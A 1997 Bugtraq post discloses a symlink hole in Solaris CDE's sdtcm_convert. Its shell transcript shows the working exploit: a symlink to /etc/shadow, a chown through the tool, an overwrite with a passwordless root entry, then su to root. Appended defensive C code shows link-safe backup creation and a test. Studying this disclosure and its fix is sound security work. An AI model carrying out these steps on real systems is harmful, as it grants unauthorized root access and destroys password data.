[4085] in bugtraq
Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
daemon@ATHENA.MIT.EDU (Adam Morrison)
Sun Feb 23 14:19:45 1997
Date: Sun, 23 Feb 1997 12:45:40 +0200
Reply-To: Adam Morrison <adam@MATH.TAU.AC.IL>
From: Adam Morrison <adam@MATH.TAU.AC.IL>
To: BUGTRAQ@NETSPACE.ORG
> Is this the bug fixed in the Sun patches:
> 103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
> 103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
> 103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
> 103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
> or is it a new one?
That's hard to know, since this patch is not publicly available off
SunSolve (not right now, anyway).
There's at least one other hole in sdtcm_convert which this patch may or may
not fix.
CDE is generally a can of worms.
$Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $
Script started on Thu Jul 11 22:15:03 1996
22:15 [wumpus:~] % whoami
adam
22:15 [wumpus:~] % ls -l /etc/shadow
-r-------- 1 root sys 291 Jul 11 22:14 /etc/shadow
22:15 [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
22:15 [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
Loading the calendar ...
WARNING!! Data will be lost when converting version 4 data format
back to version 3 data format.
Do you want to continue? (Y/N) [Y] y
Doing conversion ...
Writing out new file ...
Conversion done successfully.
Total number of appointments = 0
Number of one-time appointments converted = 0
Number of repeating appointments converted = 0
Number of one-time appointments pruned = 0
Number of repeating appointments pruned = 0
The original file is saved in /tmp/calorig.adam
22:15 [wumpus:~] % ls -l /etc/shadow
-r--rw---- 1 adam daemon 3114 Jul 11 22:15 /etc/shadow
22:15 [wumpus:~] % chmod 644 /etc/shadow
22:15 [wumpus:~] % cp /dev/null /etc/shadow
cp: overwrite /etc/shadow (y/n)? y
22:15 [wumpus:~] % ls -l /etc/shadow
-rw-r--r-- 1 adam daemon 0 Jul 11 22:15 /etc/shadow
22:15 [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
22:16 [wumpus:~] % su
# id
uid=0(root) gid=1(other)
# exit
script done on Thu Jul 11 22:16:21 1996
adam?
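
Added example, not part of the original post and not sdtcm_convert's code: the transcript above is consistent with a privileged program creating and chowning its backup file by path, so the C below shows a creation pattern that refuses a link planted at that path. The function names, the demo directory and the file contents are assumptions constructed for the illustration.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper (not sdtcm_convert's code): create a backup file from a
 * privileged process without following a link planted at `path`. */
int create_backup_safely(const char *path, uid_t owner, gid_t group)
{
    /* O_CREAT|O_EXCL fails if anything, even a dangling symlink, already
     * exists at path; O_NOFOLLOW refuses a symlink as the last component. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    /* Act on the descriptor we just created, never on the path again:
     * a path-based chown() could be redirected after the open. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1 ||
        fchown(fd, owner, group) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed check: plant a symlink where the backup would be written and
 * confirm the call is refused and the link target is unchanged (returns 1). */
int demo_symlink_is_refused(void)
{
    char dir[] = "/tmp/bkdemoXXXXXX", target[64], backup[64];
    struct stat before, after;
    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(backup, sizeof backup, "%s/calorig.demo", dir);
    int t = open(target, O_WRONLY | O_CREAT | O_EXCL, 0400);
    if (t < 0 || write(t, "constructed\n", 12) != 12 || close(t) != 0)
        return 0;
    if (symlink(target, backup) != 0 || stat(target, &before) != 0)
        return 0;
    int fd = create_backup_safely(backup, getuid(), getgid());
    int ok = fd < 0 && stat(target, &after) == 0 &&
             after.st_size == before.st_size && after.st_mode == before.st_mode &&
             after.st_uid == before.st_uid;
    if (fd >= 0) close(fd);
    unlink(backup); unlink(target); rmdir(dir);
    return ok;
}
```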